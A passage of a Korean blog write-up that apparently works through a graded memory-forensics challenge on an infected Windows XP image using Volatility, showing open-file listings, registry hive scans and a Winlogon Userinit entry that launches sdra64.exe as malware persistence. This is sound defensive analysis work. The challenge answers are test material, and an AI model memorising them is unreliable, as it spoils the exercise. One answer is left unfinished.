[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility files -p 1752 -f Bob.vmem
Pid: 1752
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \lsarpc
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr106.tmp
File   \Program Files\Adobe\Acrobat 6.0\Resource\Font
File   \Program Files\Adobe\Acrobat 6.0\Resource\CMap
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr10C.tmp
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File   \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr110.tmp
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \Documents and Settings\Administrator\Application Data\AdobeUM
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
File   \Documents and Settings\Administrator\Cookies\index.dat
File   \Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
File   \Endpoint
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \ROUTER
File   \ROUTER
File   \Endpoint
File   \AsyncConnectHlp
[/code]

위 목록에서 DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php 경로의 파일을 확인할 수 있다.

8. If any suspicious files can be extracted from an injected process, do any anti-virus products pick up the suspicious executable? What is the general result from anti-virus products? (6pts)

파일이 추출이 가능한가? 음.

9. Are there any related registry entries associated with the payload? (4pts)

레지스트리는 Volatility 플러그인을 이용하여 풀 수 있다. 아래 경로에서 Memory Registry Tools 을 받도록 하자.
http://moyix.blogspot.com/2009/01/memory-registry-tools.html
[code lang-bash]D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivescan -f Bob.vmem
Offset          (hex)
44658696        0x2a97008
44686176        0x2a9db60
48529416        0x2e48008
55269896        0x34b5a08
57399112        0x36bd748
59082008        0x3858518
70588752        0x4351950
111029088       0x69e2b60
114539360       0x6d3bb60
121604960       0x73f8b60
180321120       0xabf7b60
191408992       0xb68ab60
244959264       0xe99c820

D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivelist -f Bob.vmem -o 0x2a97008
Address      Name
0xe1d6cb60   \Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1de0b60   \Documents and Settings\Administrator\NTUSER.DAT
0xe1769b60   \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17deb60   \Documents and Settings\LocalService\NTUSER.DAT
0xe1797b60   \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17a3820   \Documents and Settings\NetworkService\NTUSER.DAT
0xe1526748   \WINDOWS\system32\config\software
0xe15a3950   \WINDOWS\system32\config\default
0xe151ea08   \WINDOWS\system32\config\SAM
0xe153e518   \WINDOWS\system32\config\SECURITY
0xe139d008   [no name]
0xe1035b60   \WINDOWS\system32\config\system
0xe102e008   [no name]

D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility printkey -f Bob.vmem -o 0xe1526748 "Microsoft\Windows NT\CurrentVersion\Winlogon"
Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010

Subkeys:
   GPExtensions (Stable)
   Notify (Stable)
   SpecialAccounts (Stable)
   Credentials (Volatile)

Values:
REG_DWORD AutoRestartShell : 1 (Stable)
REG_SZ    DefaultDomainName : BOB-DCADFEDC55C (Stable)
REG_SZ    DefaultUserName : Administrator (Stable)
REG_SZ    LegalNoticeCaption :  (Stable)
REG_SZ    LegalNoticeText :  (Stable)
REG_SZ    PowerdownAfterShutdown : 0 (Stable)
REG_SZ    ReportBootOk : 1 (Stable)
REG_SZ    Shell      : Explorer.exe (Stable)
REG_SZ    ShutdownWithoutLogon : 0 (Stable)
REG_SZ    System     :  (Stable)
REG_SZ    Userinit   : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_SZ    VmApplet   : rundll32 shell32,Control_RunDLL "sysdm.cpl" (Stable)
REG_DWORD SfcQuota   : 4294967295 (Stable)
REG_SZ    allocatecdroms : 0 (Stable)
REG_SZ    allocatedasd : 0 (Stable)
REG_SZ    allocatefloppies : 0 (Stable)
REG_SZ    cachedlogonscount : 10 (Stable)
REG_DWORD forceunlocklogon : 0 (Stable)
REG_DWORD passwordexpirywarning : 14 (Stable)
REG_SZ    scremoveoption : 0 (Stable)
REG_DWORD AllowMultipleTSSessions : 1 (Stable)
REG_EXPAND_SZ UIHost     : logonui.exe (Stable)
REG_DWORD LogonType  : 1 (Stable)
REG_SZ    Background : 0 0 0 (Stable)
REG_SZ    AutoAdminLogon : 0 (Stable)
REG_SZ    DebugServerCommand : no (Stable)
REG_DWORD SFCDisable : 0 (Stable)
REG_SZ    WinStationsDisabled : 0 (Stable)
REG_DWORD HibernationPreviouslyEnabled : 1 (Stable)
REG_DWORD ShowLogonOptions : 0 (Stable)
REG_SZ    AltDefaultUserName : Administrator (Stable)
REG_SZ    AltDefaultDomainName : BOB-DCADFEDC55C (Stable)
[/code]

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다